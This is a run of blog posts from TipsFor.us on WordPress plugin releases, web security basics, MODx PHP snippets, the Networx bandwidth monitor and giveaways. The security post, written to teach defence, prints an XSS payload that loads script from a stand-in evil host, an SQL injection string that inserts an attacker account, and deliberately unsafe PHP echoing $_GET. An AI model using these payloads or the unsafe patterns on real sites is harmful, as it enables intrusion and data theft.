8. You should be done now, but the WordPress SVN repository has been so problematic…. keep an eye on your plugin’s download page and verify that the changes get picked up. The changes should be picked up within 15 minutes or so… if they don’t get picked up, look at the downloaded zip file carefully… does the link say one thing but the name of the zip file says something else? It’s easy to mix things up, so if you get stuck, try reviewing the steps here.

How to release updates to your WordPress plugin (Long Version)

Ok, that was too quick? Well, we left out some important geeky points. The way WordPress’ download page works is that it looks at the readme.txt file at the HEAD of the repo, and then it follows the value listed there for Stable tag. If the Stable tag lists version 0.8, then the information from tags/0.8/readme.txt is used to generate your plugin’s information page and the files in tags/0.8 are packaged up into a zip file and that’s what downloads when the user clicks the download link.

Can you see the problem with this setup? Normally, when you tag a directory in SVN, that copy is treated as a read-only reference, but in this setup, it is frequently easier and less prone to errors for you to go into the tags directory and make your edits. This is normally a bit no-no for version control!

So the safer way to do this is to develop your plugin normally inside the wp-content/plugins directory and submit to the trunk as you normally do. Once you’re ready to publish a release, go to a new folder somewhere on your hard drive and checkout your ENTIRE project, trunk, tags, and all. Then you can do your tagging operation locally, e.g. svn copy trunk tags/0.9, and that will give you a new directory. You can update that directory’s readme.txt file and your plugin’s information header, then commit all of your code (trunk and all tags folders).

Hope that helps los dudes.

Post from: TipsFor.us


Releasing New Versions of your WordPress Plugins

You've been F'd in the A!

Make Rolling Backups

If you do nothing else, make sure you are backing up your site and its databases. So long as you know if/when your site fails (or is hacked) and have the ability to roll back to a known good state, you have little to fear.

Make SURE you practice restoring a site from your backups! An untested backup is worthless. Nothing is worse that THINKING you have a viable backup only to discover that it is actually corrupted.

As your backup needs mature, consider storing them offsite, e.g. on Amazon’s S3 service.

I’m supplying two of my most-used backup scripts for those in need. These are fairly simple, but they will work on shared hosts. They will backup a web site’s files and its databases.

Be Diligent about Passwords

You’ve probably heard this a hundred times before, but it is really important:

• Avoid simple passwords! Try mixing up combinations of smaller units, e.g. “AlphaBetaCharlie” instead of “abc”. Be creative. You can have strong passwords that are easy to remember!
• Store your passwords in a safe place, e.g. in a password manager like KeePass or in an encrypted disc image
• Change your Passwords Frequently! Literally, put this in your calendar so you remember to do it on a periodic basis. This helps avoid brute-force attacks.
• As a secondary line of defense, you can put an .htaccess password on your manager pages. All this does is slow down a brute-force attack by forcing the attacker to crack an additional password.

Password Protecting Directories using .htaccess

This adds an additional layer of authentication to a site or to a page; it’s not meant to substitute for more robust firewall rules or active filtering, but it is easy to set up.

First, create a username and password in a file that .htaccess can read. This can be done on the bash command line using the htpasswd command:

htpasswd -c /path/to/htpassword/file name_of_user

Next, add the following to your .htaccess file. Be sure you reference the file you just created above:

AuthName "Protected Area"
AuthGroupFile /dev/null
AuthType Basic
AuthUserFile /path/to/htpassword/file
Require valid-user


For some more detailed information on .htaccess passwords, see this page.

Stay Patched

Make sure you’ve got an updated version of your operating system, your scripting language (PHP), your database (MySQL), and your software (WordPress, MODx, etc.). Sometimes applying patches can be scary, but it’s a lot less so if you’ve got those rolling backups in place!

I want to make mention of a very useful tool: SimpleScripts. It’s available on Bluehost accounts; it provides one-click installs of many web software packages (like WordPress and MODx) and it will alert you to update them when you log into your cPanel. It’s a real time-saver!

Clean your Room!

• Do not install superfluous/untrusted software on your site! Don’t go dumpster diving for code that’s going to end up on a public-facing web site!
• Shut down services you’re not using (e.g. blog posts) because it takes more time to secure them.
• Do not store backups or sensitive data inside your document root!
• Encrypt sensitive data
• Check permissions.

Don't put backups or database dumps in your document root!

Make sure you organize your site’s files in a way that ensures that only you have access to sensitive data like backups or database dumps. These should NEVER be stored in the publicly viewable document root!

Cross Site Scripting

Behold the terror that is:

<?php print $_GET['x']; ?>

That code should NEVER be used on a public site because it effectively gives free access to the public to put whatever they want on your site! This type of code often sneaks into pagination links or into code that re-populates forms, e.g.:

<input type="text" name="myfield" value="<?php print $_POST['myfield']; ?>" />

where the ‘myfield’ variable contains something like:
" /> <script src="http://evilsite.com/js/screwed.js"></script>

For a list of values you might want to try pasting into form fields to see if they are secure, check out this great cheat sheet at http://ha.ckers.org/xss.html

In the end, be REALLY aware of any user-submitted data. Users can put their own data into ANY form field, and into any cookie, so anything in the $_GET, $_POST, or $_COOKIE arrays (and also the $_REQUEST array) is inherently insecure and should be carefully filtered. These are like the STDs of the web!!!

For articles about web hacks and some good real-world examples, check out other articles on http://ha.ckers.org/

Don’t Take Cookies From Strangers!

If you thought cookies were somehow immune to the area of security threats, they are not! It’s easy to write your own! The Firefox Web Developer plugin lets you easily create your own cookies. This is great as a web developer, but it can also be a sneaky tool for a hacker to introduce unintended code to your application, so filter cookie contents as carefully as you would the user-submitted forms.

Cookies also store the PHP session id; all $_SESSION data is stored on the server, but the unique key that associates that data with the user is stored in the user’s cookie. If one user authenticates, it’s possible for another user to make requests using that $_SESSION id! Especially with applications that require a login, it’s good practice to get a new session id using session_regenerate_id().

Filtering data

Every time you submit form data, you should write your regular expressions very carefully so your application accepts ONLY clean, valid data. In general, if you can keep input as simplistic as possible, it tends to be easier to secure. Integer only inputs are “safer” than alphabetic inputs. Alphabetic input is safer than input that accepts HTML tags, and so on.

Consider the following filters:

Type-Casting to force integer only values:

<?php
$x = (int) $_GET['x'];
?>



Alphabetical Characters Only:


// Accepts only letters a-z (case insensitive)
function alphabetical($str)
{
if ( preg_match('/^([a-z])+$/i', $str) )
{
return $str;
}
else
{
return FALSE;
}
}


For PHP coders, get familiar with the preg_replace() function: it offers a more standard regular expression syntax (the often emulated Perl syntax). Also have a look at the strip_tags() function.

Frame Buster

A common trick used in phishing scams or to perpetrate click fraud involves iframe-ing a site. Basically, the “trick” relies on the HTML iFrame tag to make one site display the contents of another without being obvious to the casual user.

One partial solution to this common attack vector is to use some simple javascript that checks to ensure that the page the parent page and not being iFramed:

<SCRIPT LANGUAGE=JavaScript>
<!--
if (top.frames.length!=0)
top.location=self.document.location;
// -->
</SCRIPT>


Do a Google search for “frame buster javascript” to find other examples.

SQL Injection

This is a very broad topic, and there are numerous ways that SQL-injection might be used to compromise a site, but they all rely on the same principle: you construct strings of SQL statements and issue them against your database. If a malicious user is able to put his own data into one of those strings, it’s possible that a user can execute queries on your database that you never expected. This often gets back to form-validation and the ever important task of filtering user-submitted data!

Here’s a not-so-hypothetical PHP example:


$username = $_POST['username'];
$sql = "SELECT * FROM `users` WHERE `username`='$username'";

where $username contains something like:
'; INSERT INTO users (username, password) VALUES ('hacker_dude', MD5('xxxxxx') )


When that executes, 2 different queries are sent to the database instead of one, and if your’e not careful, it can allow an attacker to gain access to parts of your site and delete or steal data.

One strong line of defense against this type of attack is using a robust database driver that allows for the use of prepared statements (available since MySQL 4.1): where you prepare a statement once, then execute it multiple times with only certain defined variables changing. What this does is it allows you to define your query and only let the user supply the variables to be used in that query. This is a much more sensible option than letting the user essentially construct the query from scratch.

More mature database driver libraries (such as phpmysli) will allow you to use prepared statements.

You should also get familiar with escaping quotes in your database queries; this isn’t anywhere as effective as using prepared statements, but sometimes you have to use statements that aren’t prepared, so get familiar with how to escape strings before sending them to the database. In PHP, use the mysql_real_escape() function.

Finally, consider setting up special database users and roles to handle different types of queries. If a query is hijacked, it can only execute with the same permissions as the database handle. In other words, you wouldn’t grant delete or insert permissions to a database handle that was used only for selecting data. It’s more work to set up your database handles this way, but it may help prevent an attack from succeeding.

Conclusion

Watch your cornhole. There’s a lot going on a web site, and there are a lot of ways to abuse the technologies that run them. If you understand how the exploits occur, you’ll be better prepared to prevent them.

Post from: TipsFor.us


Basic Web Security

Giveaway Link

The Data Recovery Wizard is capable of recovering deleted files, but it can do much more. It can also help recover files on a disk partition after an accidental format, or even restore a lost partition.

Supported filesystems include FAT and NTFS, and supported operating systems include Windows 2000, XP, and Vista (32-64 bit). Unfortunately, it appears that Windows 7 is not officially supported.

Did you miss this giveaway, or want to try a comparable freeware program? Give Recuva a shot.

Post from: TipsFor.us


Get EASEUS Data Recovery Wizard for Free (Giveaway)

Click here to view the embedded video.

Adding a Snippet

MODx newcomers are sometimes confused as to where to upload the PHP files… YOU DON’T UPLOAD IT. You paste it into a database record. You can reference files on the file system, but you don’t have to.

1. To add a Snippet from the MODx (v1) manager go to Elements –> Manage Elements –> Snippets then paste in your PHP code.
2. Be sure to give it a unique name (I recommend avoiding spaces in the name)
3. Give it a category: this will make your Snippet easier to find in the manager.

Recommended Components of a PHP Snippet

This applies to ANY code you write, but for the record, please include the following documentation as comments in your Snippet:
1. SUMMARY: a sentence describing what the Snippet does.
2. INPUT: list any input variables the Snippet can accept. It’s good to note the data type (e.g. integer/string), whether or not they are required, or whether or not they have a default value.
3. OUTPUT: list any special output created by the Snippet. Usually it’ll just be HTML, but it’s good to note any external actions (e.g. whether it updates a database row).
4. EXAMPLE: give an example of how the Snippet should be called.

Sample Comment Block


/*---------------------------------------------------------
SUMMARY: Formats list of cartoon characters using referenced chunk
INPUT:
$chunk_name = string; Name of Chunk to be used for formatting output.
OUTPUT:
HTML or it logs an error.
EXAMPLE:
[!ComicExample? &chunk_name=`myChunk`!]
----------------------------------------------------------*/
?>


Coding Suggestions and Rules of Thumb

1. Develop your Interface before you code: that bit about adding comments isn’t just for other users, it can help you determine how you want to be able to interact with your code. Coding to an interface is good way of establishing goals and structure before you even start writing the actual code.
2. Initialize your variables: This cuts down on the possibility of security exploits, bugs, and it makes your code easier to read, e.g.:
$output = '';
$garfield_characters_array = array();

3. Sanitize your input: if you are getting any user entered data (e.g. anything out of the $_POST or $_GET array), sanitize the data using regular expressions and if/then statements. Make SURE you have eliminated any possibility that the data is something other than what your program expects.
4. Test as you Go: PHP doesn’t have a built-in debugger, so don’t go too long without checking to see if your code still “compiles” (technically, you should check to see if it has a valid syntax and if it executes). Checking often will help you track down where you made a mistake.
5. Use Good Variable and Function Names: be descriptive. Don’t become a member of the hated “ASCII Preservation Society”. Besides, if you use unique variable names, it becomes MUCH easier to search for instances of that variable, and you’re less likely to have variable collisions.
6. Group your Code into Units: In a word, use functions that fit on the page. If you can SEE it, you’re less likely to UNDERSTAND IT. Chapters of uninterrupted code are hard to debug and test.
7. Reuse your Code: if there are cases in your code where you’re copying and pasting identical or NEARLY identical parts, then it’s time to relegate that code to its own separate function.
8. Log your Errors: if something goes wrong, let your users know about it. It’s a wonderful thing to use the MODx logging function.
9. DO NOT MIX HTML and PHP! There are a few cases where where this is acceptable, but it is good architectural design to separate your view (i.e. your HTML) from your logic. If you have to edit your PHP code to change div tags or CSS classes, then you probably did something wrong. Instead, use MODx Chunks to format Snippet output; your code will be MUCH cleaner as a result and MUCH easier to maintain.

Including Files from the File System

If you write anything more than simple Snippets, you’ll want to put your PHP file(s) on the file system and reference them from the Snippet stored in the MODx database. You can do this by including a standard include or require statement, e.g.

include($modx->config['base_path'].'assets/snippets/mysnippet/include_me.php');

The standard MODx location would be in your own folder within the /assets/snippets directory.

Things to Remember When Including Files and Using Functions

1. Variable Scope: the $modx super-object and the methods that go along with it will not remain in scope within a funciton; use the global to ensure that the globally scoped $modx variable instance is used inside the function. Compare the two instances of the same API call:
// INSIDE a function
function inside_a_function($chunk_name,$garfield_characters_array)
{
global $modx;
$output = $modx->parseChunk($chunk_name, $garfield_characters_array, '[+', '+]');
return $output;
}

// Or OUTSIDE a function
$output = $modx->parseChunk($chunk_name, $garfield_characters_array, '[+', '+]');

2. You can’t return a value directly from an included file: because MODx treats Snippets as functions, it’s considered good form to always return a value, e.g. “return $output;” or “return TRUE;” but this MUST be returned from the original Snippet in the database; if you return output from the included file, you’ll have to return it again from the original database Snippet code. See the video for this quirk in action.
3. Take advantage of the File System: if you are developing stand-alone PHP files, you can use the bash terminal (on Linux or OS X machines) to test the PHP syntax. Simply navigate to the directory where your file is and type:
php -l name_of_your_file.php

Post from: TipsFor.us


Writing Custom PHP Snippets for MODx (part VII)

Systems: Windows Only (2000, XP, Vista, 2008 / Both 32 and 64 bit)

Donationware: Technically it’s free, but when you see the level of craftsmanship in this program, you will want to donate.

Website: Softperfect.com

I recently changed ISPs to one with much more consistent service, but the trade off is that I now have a rather small bandwidth cap. As much as we hate them, bandwidth caps are probably in all of our futures. The important thing is to have control over and be informed of your usage (before the bill arrives). I needed a reliable way to keep track of my bandwidth, so I tested out several free bandwidth monitoring softwares. My ISP has its own online bandwidth usage calculated, but I wanted a redundant system (one which I could use to make sure they were honest in their tracking).  In my experiments, I found Networx to be the best. Its primary virtue is its ability to be as advanced as you need it to be. For my multiple computer home network, it has every feature I could ask for. Let’s take a closer look.

The software is so unobtrusive; it even lacks a full control window.  Instead, you can access all aspects of the software from the taskbar icon.

A left click will give you a quick bandwidth summary/ a right click will show you the menu.

Before we get to ridiculous number of features available in the menu, let’s check out my favorite feature.A right click anywhere on the task bar brings up a windows menu that has a “toolbars” option, if you go there you will find a new entry: Networx Desk Band. Activating this toolbar gives you a quick real time read out.

I know what you’re thinking: But I don’t like red and white graphs! Well, you can fully customize that little read out; I’ll get to that a little later on.First, lets go back to that right click menu from the Networx taskbar icon.

Your first 3 options all work together:

Show Graph

- This displays a full size visual read out that you can place on your desktop wherever you want.

Reset Graph (Only present if “Show Graph” is clicked first) – This option will clear the current data displayed on the graph, not unlike the trip counter reset in your car.

Enable Click Through (Only present if “Show Graph” is clicked first) - Will make the graph act as if it is not really there.You can literally click through the graph to select things. Be careful though, this means you can’t resize or move the graph window without turning off “Click Through” the same way your turned it on.

Speed Meter

- This works sort of like a heart monitor for you bandwidth.You hit “Play” and for the duration you allow it to run, it records average, maximum and total transfer.You can then export it directly to a txt file.

Usage Statistics

- You can access this menu from a double click on the icon.This will probably be your most visited window in the battle to keep informed about transfer totals. The first thing you will see is the “General” Tab:

Not much to do here, except see a quick summary of your total usage all in one place.

The Daily Report - Here is where you can really begin to see detail present in this program.If you have this set up on the family computer, you can directly see what day of the month the highest transfer happened.If you are not a fan of the spread sheet, they also provide you a visual readout of the past week.

Weekly/Monthly Report - The same data as the daily, but handily calculated for you either size increment.

Custom - The most powerful data aggregator in this entire software. You can give it the date-through-date specifics and it will automatically set up the graph in the most appropriate way.

Dial-up Sessions - If you have a minute/transfer based dial-up connection, this tab is vital.It records every time you connect to your dial up provider, the date, amount of time spent, transfers, etc.You might think this is outdated, but you would be surprised how many areas still do not have broadband.

Hourly Rates - for you true statistics hounds out there, you can follow your transfer rates on an hourly basis.

Export - Oh yeah, you can also export all of these charts to Excel for easy archiving.

Users - If everyone who uses the computer has separate logons, you can track the data per user.You know, easily figure out which roommate is the bandwidth hog.

Quota

This is a handy system for letting you set the maximum transfer/duration.For me that is 50 gigs per month.I set it at 45 gigs, however, because it notifies you with a little pop-up window when you have met your quota.

Settings

All of the settings for the program.Let’s go one tab at a time.

General - This tab has the settings for “Load on Windows Startup, Check for Updates”, And most importantly: Which internet connection is monitored. This is essential if you have multiple connections, or utilize a different connection for intra-network traffic.

Graph - Settings to tweak how the graph output functions.This is really for power users who want control over aspect of their graph.

Graph Colors - This may seem trivial or nit-picky, but on some monitors you may want to adjust the colors of the graph for optimal resolution.High contrast is an option in every aspect of most operating systems for those who need it for accessibility.Or, you may just want to make it look pretty.

Notifications - This tab’s settings tell the software when you notify you of certain things.It can tell you if your connection falls below it’s usual transfer rate, or if it exceeds a predetermined speed.You can also customize how exactly it notifies you, a tone or a pop up, ect.

Advanced - There is one truly important feature in here.In this tab you can set what day your billing cycle begins on. I’m lucky, my bandwidth resets at midnight on the first.For some of you, it might be on the 14^th or 21^st, etc. DO NOT FORGET TO SET THIS, OR YOUR TOTAL BANDWIDTH USED FOR THE MONTH WILL NOT BE ACCURATE!

If you have multiple computers using the same network, you will need to install Networx on all of them, and tick the box under “Synchronization” or else YOU WILL ONLY BE TRACKING THE DATA TRANSFERRED FROM THIS COMPUTER.That will not be an accurate measure of the total usage.

Trace Route

- This is a power user feature.Your average user will never have a need to track a packet from your computer to a source IP.

Ping

- This works the same way as the command line ping.You enter a location to ping, and it will tell you the millisecond duration of the test transfer.

NetStat

- This is pretty useful, it lists every program or service that is accessing the internet, or has rights to do so, and where it’s sending from and to.

Conclusion

So that’s about all you need to know to keep up with your bandwidth use by utilizing Networx. If you have a different favorite Bandwidth tracker, let us know in the comments below.I am on month 2 of using Networx, and have had no problems, if you have, also let us know.At the end of my first month of use, there was a 458 megabyte discrepancy between my Networx report and my ISPs total report.I attribute this to the Xbox360 updates and purchases along with my iPhone app downloads.

Post from: TipsFor.us


Networx – Free Bandwidth Monitoring Software (Getting the Most Out of It)

Many thanks to all of you who entered. Stay tuned for future giveaway announcements, as we plan to host several more giveaways on TipsFor.us. What might we give away next? Maybe some RAM, a Macbook, or maybe some California IOUs?

Post from: TipsFor.us


TipsFor.us Giveaway – iPod Touch Winner Announcement